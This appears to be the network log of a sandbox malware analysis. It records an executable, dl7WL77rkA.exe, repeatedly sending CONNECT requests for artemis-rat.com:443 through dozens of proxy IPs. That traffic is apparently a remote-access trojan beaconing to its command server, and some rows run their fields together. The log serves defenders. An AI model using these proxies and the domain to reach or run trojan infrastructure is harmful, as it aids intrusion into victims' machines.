                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.905103922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.074121952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1361192.168.2.552042115.167.124.7580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.653268099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.624375105 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1362192.168.2.55359831.44.82.2380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.653311014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405092001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.499130011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.626965046 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1363192.168.2.553620185.217.143.23803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.659826040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1364192.168.2.553557103.83.36.156783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.660538912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1365192.168.2.55358178.38.108.19910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.696978092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1366192.168.2.553549102.132.50.680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.697710037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1367192.168.2.553645150.230.96.150192913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.697961092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1368 | 192.168.2.5 | 53671 | 172.67.182.107 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.699110985 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.854408026 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:43 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1369 | 192.168.2.5 | 53641 | 115.146.225.137 | 10046 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.743164062 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.446008921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1370 | 192.168.2.5 | 53654 | 200.10.73.210 | 5678 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.743355989 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1371 | 192.168.2.5 | 53735 | 172.67.181.147 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.743467093 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.898401022 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:43 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1372192.168.2.55363436.92.81.18141453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.746926069 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1373 | 192.168.2.5 | 53750 | 162.159.250.145 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.747518063 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.908642054 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:43 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1374 | 192.168.2.5 | 53752 | 162.159.246.135 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.747565985 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.908795118 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:43 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1375 | 192.168.2.5 | 53370 | 98.178.72.21 | 10919 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.749219894 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1376192.168.2.55364431.148.207.153803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.761409044 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.099456072 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1377192.168.2.55364283.243.92.15480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.762885094 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1378192.168.2.55367766.228.37.25278413876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.769155979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405045986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.202018023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.593286991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405342102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.202124119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.998820066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.702166080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1379192.168.2.553618102.132.48.6080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.777966976 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.694869995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1380192.168.2.55365940.76.160.14390023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.782234907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1381192.168.2.553724129.213.150.205803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.819437981 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1382192.168.2.553657195.87.217.7533893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.821592093 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1383192.168.2.55369924.176.53.18380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.837626934 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.445987940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238980055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.702491999 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.514614105 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.352258921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:55.202020884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:00.796720028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1384192.168.2.553804172.67.182.96803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.858163118 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.012917042 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1385192.168.2.553672114.156.77.10780803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.858505964 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1386192.168.2.553285192.111.130.5170023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.870135069 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1387192.168.2.55366754.36.122.16297963876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:43.870498896 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
